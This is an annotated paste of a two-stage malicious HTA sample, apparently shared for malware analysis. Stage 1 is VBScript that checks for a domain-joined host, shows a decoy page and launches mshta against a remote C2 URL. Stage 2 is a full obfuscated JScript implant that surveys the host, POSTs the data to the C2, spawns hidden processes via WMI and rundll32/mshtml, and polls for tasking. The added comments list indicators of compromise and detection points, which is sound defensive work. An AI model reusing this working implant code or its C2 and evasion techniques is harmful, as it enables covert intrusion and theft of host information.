dissectmalware

Malicious HTA

Jun 28th, 2019
  1. igggggnooooooor this line
  2.  
  3. ///////// Stage 1 ///////////////////
  4. <script language="VBScript">
  5. Dim iURL
  ' Decoy URL: opened in the user's default browser on the success path below so the
  ' victim sees a plausible page while the second stage is fetched.
  6. iURL = "https://www.amazon.com/gp/drive"
  7.  
  8. Set objShell = CreateObject("Wscript.Shell")
  ' Host check: %LOGONSERVER% (leading "\\" stripped) is compared with %COMPUTERNAME%.
  ' When a user is logged on with a local (non-domain) account, LOGONSERVER is normally
  ' the local machine name, so the two match and the script only shows a fake error;
  ' the next stage is fetched only when the names differ, i.e. on what looks like a
  ' domain-joined host. This is the sample's analysis-VM / workgroup filter.
  9. strInfo = objShell.expandenvironmentstrings("%COMPUTERNAME%")
  10. strInfo2 = objShell.expandenvironmentstrings("%LOGONSERVER%")
  11. strInfo2 = replace(strInfo2, "\\", "")
  12. if strInfo2 = strInfo then
  13.         msgbox ("error opening document")
  14. else
  ' Success path: open the decoy, then launch mshta.exe against the remote stage-2 HTA
  ' and close this window. Detection points: mshta.exe started with a URL on its
  ' command line, child of the process hosting this HTA; outbound TLS to the
  ' docshare.safedatasystems.com host named below.
  15.         objShell.run(iURL)
  16.         objShell.Run "mshta https://docshare.safedatasystems.com:443/235gfd"
  17.         Window.Close
  18.         end if
  19. </script>
  20.  
  21.  
  22.  
  23. ///////// Stage 2 //////////////////
  24.  
  25. <html>
  26. <head>
  27. <script language="JScript">
  // Window hiding for the stage-2 HTA: move the window far off-screen, drop focus and
  // shrink it to 2x4 px so no visible HTA window is shown to the user.
  28. window.moveTo(-1337, -2019);
  29. window.blur();
  30. window.resizeTo(2, 4);
  31.  
  // Silence script-error dialogs and push the window back out of focus whenever it is
  // focused. Wrapped in try/catch presumably because the same script is also meant to
  // run under a host with no `window` object (see the typeof(window) check further down).
  32. try
  33. {
  34.     window.onerror = function(sMsg, sUrl, sLine) { return false; }
  35.     window.onfocus = function() { window.blur(); }
  36. }
  37. catch (e){}
  38.  
  // Implant state object. Field meaning as used elsewhere in this listing:
  //   WUGSEFYMRD  Scripting.FileSystemObject (temp-file read/delete)
  //   UTINHUTENQ  WScript.Shell (RegRead, Run, ExpandEnvironmentStrings)
  //   ZXNDGZZVJS  base C2 URL (same host/path stage 1 passed to mshta)
  //   FVQIPGWMOE  32-hex-char implant/session identifier, also embedded in the beacon URL
  //   LLCZPIKBVW  current "jobkey"; empty here, compared with "stage" in the bootstrap block
  //   BBFFFMPAGP  beacon URL prefix with two query parameters (V0GGVJNH4X=<id>;GU1SYCFEL4=) —
  //               a usable network IoC; the jobkey and a trailing ";" are appended by RMQSOXDELM
  //   UHZHKLSJIG  expiry as epoch milliseconds (string), checked by DoWork()
  // FPQBBTIMXD(): terminate this instance. Tries several ways of closing the HTA window,
  // then WScript.quit() for the script-host case, then CBOGFVBUDV.currentPID()/kill().
  // CBOGFVBUDV is only ever created as an empty object in this listing, so that last
  // branch throws and is swallowed by its catch.
  39. var QASIHKVVLB={};QASIHKVVLB.WUGSEFYMRD=new ActiveXObject("Scripting.FileSystemObject");QASIHKVVLB.UTINHUTENQ=new ActiveXObject("WScript.Shell");QASIHKVVLB.ZXNDGZZVJS="https://docshare.safedatasystems.com:443/235gfd";QASIHKVVLB.FVQIPGWMOE="19cc6085c4b24bfca38cac4b59dddd21";QASIHKVVLB.LLCZPIKBVW="";QASIHKVVLB.BBFFFMPAGP="https://docshare.safedatasystems.com:443/235gfd?V0GGVJNH4X=19cc6085c4b24bfca38cac4b59dddd21;GU1SYCFEL4=";QASIHKVVLB.UHZHKLSJIG="999999999999999";QASIHKVVLB.FPQBBTIMXD=function()
  40. {if(QASIHKVVLB.MMNCUJOVQX())
  41. {try{window.close();}catch(e){}
  42. try{window.self.close();}catch(e){}
  43. try{window.top.close();}catch(e){}
  44. try{self.close();}catch(e){}
  45. try
  46. {window.open('','_self','');window.close();}
  47. catch(e)
  48. {}}
  49. try
  50. {WScript.quit();}
  51. catch(e)
  52. {}
  53. try
  54. {var pid=QASIHKVVLB.CBOGFVBUDV.currentPID();QASIHKVVLB.CBOGFVBUDV.kill(pid);}
  55. catch(e)
  56. {}}
  // MMNCUJOVQX(): true when a `window` object exists (HTA / browser host), false under
  // a plain script host. Used to pick between window.close() and WScript.quit() style exits
  // and between the DoWorkTimeout() and DoWorkLoop() polling modes.
  57. QASIHKVVLB.MMNCUJOVQX=function()
  58. {return typeof(window)!=="undefined";}
  // CGHMTFFONF(): GUID-shaped (8-4-4-4-12) random hex string from Math.random. It is only
  // used to name scratch files under %TEMP% (see the collectors below), so on disk these
  // look like %TEMP%\<guid-like>.txt. Returns undefined if anything throws.
  59. QASIHKVVLB.CGHMTFFONF=function()
  60. {try
  61. {function s4()
  62. {return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);}
  63. return s4()+s4()+'-'+s4()+'-'+s4()+'-'+
  64. s4()+'-'+s4()+s4()+s4();}
  65. catch(e)
  66. {}}
  // IADMFMQGLO: host-survey helpers. Each one swallows its own exceptions and returns a
  // placeholder ("Unknown" / "") so the survey string assembled by QDLXGHIFXT always builds.
  // XBLYTDPQTZ(): elevation check. Runs `net session || echo unelevated` through the
  // command runner and reports elevated when "unelevated" is absent from the output.
  // Endpoint telemetry: cmd.exe /q /c ... net session ... with stdout redirected to %TEMP%.
  67. QASIHKVVLB.IADMFMQGLO={};QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ=function()
  68. {try
  69. {var res=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("(net session || echo unelevated)","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");if(res.indexOf("unelevated")==-1)
  70. {return true;}
  71. return false;}
  72. catch(e)
  73. {return false;}}
  // SGPEAFIMUA(): "<ProductName>***<CurrentBuildNumber>" from HKLM\...\Windows NT\CurrentVersion.
  74. QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA=function()
  75. {try
  76. {var osver=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"***"+osbuild;}
  77. catch(e){}
  78. return"Unknown";}
  // ZOIBSQLOBH(): last domain controller name recorded under Group Policy\History\DCName.
  79. QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH=function()
  80. {try
  81. {var DC=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0)
  82. {return DC;}}
  83. catch(e)
  84. {}
  85. return"Unknown";}
  // AKJGCYHLAT(): PROCESSOR_ARCHITECTURE from the system environment key.
  86. QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT=function()
  87. {try
  88. {var arch=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;}
  89. catch(e){}
  90. return"Unknown";}
  // KCXQBFNYDY(): current working directory via `cd`. Unlike the other collectors this uses a
  // fixed scratch name, %TEMP%\cwd.txt — a file-system IoC worth hunting for.
  91. QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY=function()
  92. {try
  93. {var cwd=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("cd","%TEMP%\\cwd.txt");return cwd;}
  94. catch(e)
  95. {}
  96. return"";}
  // SBMJCKVJOL(): parses `route PRINT`. Walks each line; once two "0.0.0.0" tokens have been
  // seen on a line (the default route) it returns that line's 4th non-empty token, which in
  // the IPv4 route table is the Interface column, i.e. the local address of the default-route
  // adapter. Note `line`, `zerocount`, `itemcount`, `correctflag` are assigned without `var`
  // and so become globals.
  97. QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL=function()
  98. {try
  99. {var routeprint4=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("route PRINT","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++)
  100. {line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++)
  101. {if(line[j])
  102. {itemcount+=1;if(itemcount==4&&correctflag){return line[j];}}
  103. if(line[j]=="0.0.0.0")
  104. {zerocount+=1;if(zerocount==2)
  105. {correctflag=true;}}}}}
  106. catch(e)
  107. {}
  108. return"";}
  // QDLXGHIFXT(): builds the check-in record that is POSTed to the C2 at bootstrap:
  //   "<domain>\<user>[*]~~~<computer>~~~<os***build>~~~<dc>~~~<arch>~~~<cwd>~~~<ip>~~~<acp>~~~<oemcp>"
  // where "*" after the user name marks an elevated process. Domain comes from
  // WScript.Network.UserDomain, falling back to `echo %userdomain%` via the command runner.
  109. QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT=function()
  110. {var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0)
  111. {domain=net.UserDomain;}
  112. else
  113. {domain=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("echo %userdomain%","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");domain=domain.split(" \r\n")[0];}
  114. var info=domain+"\\"+net.Username;if(QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ())
  115. info+="*";info+="~~~"+net.ComputerName;info+="~~~"+QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA();info+="~~~"+QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH();info+="~~~"+QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT();info+="~~~"+QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY();info+="~~~"+QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL();info+="~~~"+QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ();info+="~~~"+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS();return info;}
  // TTSQTDOTVQ(): ANSI code page (Nls\CodePage\ACP), default "1252". Also sent as the custom
  // HTTP request header "encoder" on every beacon, and "936" selects the certutil read path.
  116. QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ=function()
  117. {try
  118. {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\ACP");return encoder;}
  119. catch(e)
  120. {return"1252";}}
  // PXCSZRYQTS(): OEM code page (Nls\CodePage\OEMCP), default "437"; used for the `chcp`
  // prefix that the command runner puts in front of every command.
  121. QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS=function()
  122. {try
  123. {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\OEMCP");return encoder;}
  124. catch(e)
  125. {return"437";}}
  // CIAKFFSIIC: C2 interaction.
  // XGCXDJIHOT(data, headers): POST `data` to the beacon URL for the current jobkey.
  126. QASIHKVVLB.CIAKFFSIIC={};QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT=function(data,headers)
  127. {return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(),data,headers);}
  // MREYDTKIKP(e): error reporting to the C2 — the exception's number/name/description go in
  // request headers "errno", "errname", "errdesc" (each "-1"/"Unknown" when absent) and
  // e.message is the body. Swallows any failure of the report itself.
  128. QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP=function(e)
  129. {try
  130. {var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(e.message,headers);}
  131. catch(e)
  132. {}}
  // RMQSOXDELM(jobkey): beacon URL = BBFFFMPAGP + jobkey + ";" (jobkey defaults to LLCZPIKBVW).
  // The resulting query string "...;GU1SYCFEL4=<jobkey>;" is a stable pattern for proxy/IDS rules.
  133. QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM=function(jobkey)
  134. {var jobkey=(typeof(jobkey)!=="undefined")?jobkey:QASIHKVVLB.LLCZPIKBVW;return QASIHKVVLB.BBFFFMPAGP+jobkey+";";}
  // OCPMLNCMGJ(): empty POST to the beacon URL to ask for work; returns the HTTP object so the
  // caller (DoWork) can inspect status and responseText.
  135. QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ=function()
  136. {var url=QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM();return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(url);}
  // KQCWRWDBZA(jobkey, fork32Bit): spawns a new HTA instance for a job by running
  //   rundll32.exe <beacon URL>\..\..\..\mshtml,RunHTMLApplication
  // optionally with the SysWOW64 path prefixed (32-bit rundll32). Tries WMI process creation
  // first and falls back to a hidden WScript.Shell.Run. Detection: rundll32.exe whose command
  // line contains "mshtml,RunHTMLApplication" together with an http(s) URL, parented by mshta.exe.
  137. QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA=function(jobkey,fork32Bit)
  138. {var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="rundll32.exe ***K***\\..\\..\\..\\mshtml,RunHTMLApplication";if(fork32Bit)
  139. cmd=QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF()+cmd;cmd=cmd.replace("***K***",QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(jobkey));try{QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC(cmd);}catch(e){QASIHKVVLB.UTINHUTENQ.Run(cmd,0,false);}}
  // SDQYWFAOVF: HTTP transport.
  // QWILYWEITP(): Msxml2.ServerXMLHTTP.6.0 with all timeouts disabled, falling back to
  // WinHttp.WinHttpRequest.5.1 with 30 s resolve/connect/send timeouts. Both are COM clients,
  // so the User-Agent and TLS behaviour are those of the WinHTTP stack, not of a browser.
  140. QASIHKVVLB.SDQYWFAOVF={};QASIHKVVLB.SDQYWFAOVF.QWILYWEITP=function()
  141. {var http=null;try
  142. {http=new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");http.setTimeouts(0,0,0,0);}
  143. catch(e)
  144. {http=new ActiveXObject("WinHttp.WinHttpRequest.5.1");http.setTimeouts(30000,30000,30000,0)}
  145. return http;}
  // ACWUEMNQCB(http, headers): applies caller headers, defaults Content-Type to
  // application/octet-stream, and always adds a custom "encoder: <ACP code page>" header —
  // an unusual header name that can anchor a network signature.
  146. QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB=function(http,headers)
  147. {var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers)
  148. {var value=headers[key];http.setRequestHeader(key,value);if(key.toUpperCase()=="CONTENT-TYPE")
  149. content=true;}
  150. if(!content)
  151. http.setRequestHeader("Content-Type","application/octet-stream");http.setRequestHeader("encoder",QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ())}
  // LGMTONFHSH(url, data, headers): synchronous POST (third open() argument false); returns
  // the request object. `data` defaults to "".
  152. QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH=function(url,data,headers)
  153. {var data=(typeof(data)!=="undefined")?data:"";var http=QASIHKVVLB.SDQYWFAOVF.QWILYWEITP();http.open("POST",url,false);QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB(http,headers);http.send(data);return http;}
  // CBOGFVBUDV is declared empty and never populated in this listing (FPQBBTIMXD's
  // currentPID()/kill() calls on it therefore fail into their catch).
  // KKDYFDJLDD: registry access through WMI StdRegProv. Constants:
  //   IKVTUEVQJX/OKJQQPKLGL/ZYPADGQWJG = 0x80000000/1/2 = HKEY_CLASSES_ROOT/HKEY_CURRENT_USER/HKEY_LOCAL_MACHINE
  //   DMOKBPYDGJ/HXGBIEUDMZ/FPJAHMWQGT/ZETVECMZFC = 0/1/2/3 = string/binary/DWORD/QWORD value
  //   (mapping taken from which Set*Value method LXYBKWSROH calls for each)
  // FXIKUDSPEW(computer): StdRegProv moniker for `computer` (default "." = local host).
  154. QASIHKVVLB.CBOGFVBUDV={};QASIHKVVLB.KKDYFDJLDD={};QASIHKVVLB.KKDYFDJLDD.IKVTUEVQJX=0x80000000;QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL=0x80000001;QASIHKVVLB.KKDYFDJLDD.ZYPADGQWJG=0x80000002;QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ=0;QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ=1;QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT=2;QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC=3;QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW=function(computer)
  155. {var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;}
  // LXYBKWSROH(hKey, path, key, value, valType, computer): CreateKey then SetStringValue /
  // SetDWORDValue / SetQWORDValue / SetBinaryValue according to valType. Registry writes via
  // StdRegProv show up as WMI activity (wmiprvse.exe) rather than direct RegSetValue from the
  // script host, which matters when building detections.
  156. QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH=function(hKey,path,key,value,valType,computer)
  157. {var reg=QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW(computer);reg.CreateKey(hKey,path);if(valType==QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ)
  158. reg.SetStringValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT)
  159. reg.SetDWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC)
  160. reg.SetQWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ)
  161. reg.SetBinaryValue(hKey,path,key,value);}
  // KENMUZPXQD.KMXUAIQNDC(cmd): process creation through WMI Win32_Process.Create with a
  // Win32_ProcessStartup of ShowWindow=0 (hidden), CreateFlags=16777216 (0x01000000, the
  // CREATE_BREAKAWAY_FROM_JOB flag) and a 1x1 window at (1,1). Returns the new ProcessId.
  // Because the child is created by the WMI provider, its parent in process telemetry is
  // wmiprvse.exe rather than this HTA — correlate on WMI Win32_Process.Create events instead.
  // Note the `ySize` property (lower-case y) and the missing semicolon at the end of the
  // GetObject line; both are reproduced as-is.
  162. QASIHKVVLB.KENMUZPXQD={};QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC=function(cmd)
  163. {var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
  164. var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;}
  // RGTBMPDDFB: shell command runners.
  // OXMSDFIGQD(cmd, stdOutPath): runs `%comspec% /q /c chcp <OEMCP> & <cmd> 1> <stdOutPath> 2>&1`
  // hidden and waits for it, reads the captured output back (via the certutil path when the
  // ANSI code page is 936, otherwise as a raw text stream), deletes the scratch file and
  // returns the text. Command-line telemetry: cmd.exe with "chcp ... &" and a redirect into
  // %TEMP% is the recurring shape of every survey command in this sample.
  165. QASIHKVVLB.RGTBMPDDFB={};QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD=function(cmd,stdOutPath)
  166. {cmd="chcp "+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS()+" & "+cmd;var c="%comspec% /q /c "+cmd+" 1> "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(stdOutPath);c+=" 2>&1";QASIHKVVLB.UTINHUTENQ.Run(c,0,true);if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
  167. {var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(stdOutPath);}
  168. else
  169. {var data=QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN(stdOutPath);}
  170. QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(stdOutPath);return data;}
  // DKPNTDZMHC(cmd, fork): fire-and-forget runner; waits for completion only when fork is
  // false. It builds a `%comspec% /q /c` wrapper in `c` but then passes the unwrapped `cmd`
  // to Run, so `c` is dead code here (documented, not changed).
  171. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC=function(cmd,fork)
  172. {var fork=(typeof(fork)!=="undefined")?fork:true;var c="%comspec% /q /c "+cmd;QASIHKVVLB.UTINHUTENQ.Run(cmd,0,!fork);}
  // PEJMFGFUTF: file-system helpers.
  // VYENALGHYK(path): expand %VAR% references via WScript.Shell.
  173. QASIHKVVLB.PEJMFGFUTF={};QASIHKVVLB.PEJMFGFUTF.VYENALGHYK=function(path)
  174. {return QASIHKVVLB.UTINHUTENQ.ExpandEnvironmentStrings(path);}
  // PQYGQIDAVF(): "%WINDIR%\SysWOW64\" when that folder exists, else "%WINDIR%\System32\".
  // Used to pick the 32-bit rundll32.exe when a job is forked as 32-bit.
  175. QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF=function()
  176. {var base=QASIHKVVLB.PEJMFGFUTF.VYENALGHYK("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(QASIHKVVLB.WUGSEFYMRD.FolderExists(syswow64))
  177. return syswow64;return base+"\\System32\\";}
  // QABBILDSPJ(path): poll until `path` exists and is non-empty, then ReadAll() it as text.
  // Each miss sleeps by running `ping 127.0.0.1 -n 2` synchronously (roughly one second);
  // gives up after 180 misses and returns "". Those repeated ping.exe children are another
  // behavioural tell of this sample.
  178. QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ=function(path)
  179. {var loopcount=0;while(true)
  180. {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
  181. {var fd=QASIHKVVLB.WUGSEFYMRD.OpenTextFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;}
  182. else
  183. {loopcount+=1;if(loopcount>180)
  184. {return"";}
  185. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
  // NBMHEMZVXN(path, exists): same polling as above, but when `exists` is true and the file
  // is missing it first sends a POST with a "Status: NotExist" header to the C2 and returns "".
  // On ANSI code page 936 it runs `whoami` (output not captured — purpose unclear from this
  // listing) and `certutil -encode <path> %TEMP%\<guid>.txt`, then reads the base64 result with
  // QABBILDSPJ and deletes it; otherwise it reads the file through OpenAsTextStream()/read(Size).
  // `certutil -encode` against a %TEMP% file is a commonly logged LOLBin pattern.
  186. QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN=function(path,exists)
  187. {var exists=(typeof(exists)!=="undefined")?exists:false;if(!QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&exists)
  188. {var headers={};headers["Status"]="NotExist";QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT("",headers);return"";}
  189. var loopcount=0;while(true)
  190. {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
  191. {if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
  192. {var newout="%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt";QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("whoami");QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("certutil -encode "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)+" "+newout);var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(newout);QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(newout);}
  193. else
  194. {var fp=QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();}
  195. return data;}
  196. else
  197. {loopcount+=1;if(loopcount>180)
  198. {return"";}
  199. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
  // UTYAUIAKVW(path): force-delete the scratch file (second DeleteFile argument = true).
  // The bootstrap try-block starts on the same source line, after the closing "};".
  // Bootstrap, mode selected by the jobkey LLCZPIKBVW:
  //   jobkey != "stage" (the case in this paste, jobkey is ""):
  //     1. In an HTA host, write DWORD 0xFFFFFFFF to
  //        HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\MaxScriptStatements via StdRegProv
  //        (raises the limit behind the "script is running slowly" prompt) — a registry IoC.
  //     2. POST the host survey from IADMFMQGLO.QDLXGHIFXT() to the C2.
  //     3. Fork a fresh instance with an empty jobkey via rundll32/mshtml (KQCWRWDBZA); any
  //        exception is reported to the C2 with MREYDTKIKP.
  //     4. Exit (FPQBBTIMXD).
  //   jobkey == "stage": poll for work — DoWorkTimeout() in an HTA host, DoWorkLoop() otherwise.
  // Any exception escaping the whole block is reported to the C2.
  200. QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW=function(path)
  201. {QASIHKVVLB.WUGSEFYMRD.DeleteFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),true);};try
  202. {if(QASIHKVVLB.LLCZPIKBVW!="stage")
  203. {if(QASIHKVVLB.MMNCUJOVQX())
  204. {var path="SOFTWARE\\Microsoft\\Internet Explorer\\Styles";var key="MaxScriptStatements";QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH(QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL,path,key,0xFFFFFFFF,QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT);}
  205. QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT());try{QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");}catch(e){QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e)}
  206. QASIHKVVLB.FPQBBTIMXD();}
  207. else
  208. {if(QASIHKVVLB.MMNCUJOVQX())
  209. DoWorkTimeout();else
  210. DoWorkLoop();}}
  211. catch(e)
  212. {QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e);}
  // DoWork(): one tasking round. Returns false (stop polling) once the current time passes
  // the UHZHKLSJIG expiry, on any HTTP status other than 201/202, or on any exception.
  // On 201/202 with a non-empty body the body is treated as a jobkey and a new instance is
  // forked for it; 202 additionally requests the 32-bit fork. Returns true to keep polling.
  213. function DoWork()
  214. {var epoch=new Date().getTime();var expire=parseInt(QASIHKVVLB.UHZHKLSJIG);if(epoch>expire)
  215. {return false;}
  216. try
  217. {var work=QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ();if(work.status==201||work.status==202)
  218. {if(work.responseText.length>0){var jobkey=work.responseText;QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA(jobkey,work.status==202);}}
  219. else
  220. {return false;}}
  221. catch(e)
  222. {return false;}
  223. return true;}
  // DoWorkLoop(): script-host mode — poll with DoWork() until it returns false (expiry,
  // non-201/202 reply or error), then terminate. There is no delay between rounds here;
  // pacing comes only from the synchronous HTTP request.
  224. function DoWorkLoop()
  225. {while(DoWork());QASIHKVVLB.FPQBBTIMXD();}
  // DoWorkTimeout(): HTA-host mode — at most 10 DoWork() rounds. Stops early and exits if a
  // round returns false; after 10 successful rounds it forks a fresh instance with an empty
  // jobkey (re-running the bootstrap path) and exits, so a long-lived session shows up as a
  // chain of short-lived rundll32/mshtml processes rather than one persistent process.
  226. function DoWorkTimeout()
  227. {for(var i=0;i<10;++i)
  228. {if(!DoWork())
  229. {QASIHKVVLB.FPQBBTIMXD();return;}}
  230. QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");QASIHKVVLB.FPQBBTIMXD();}
  231. </script>
  232. <hta:application caption="no" windowState="minimize" showInTaskBar="no"
  233.                  scroll="no" navigable="no" />
  234.                  <!--  -->
  235. </head>
  236. <body>
  237. </body>
  238. </html>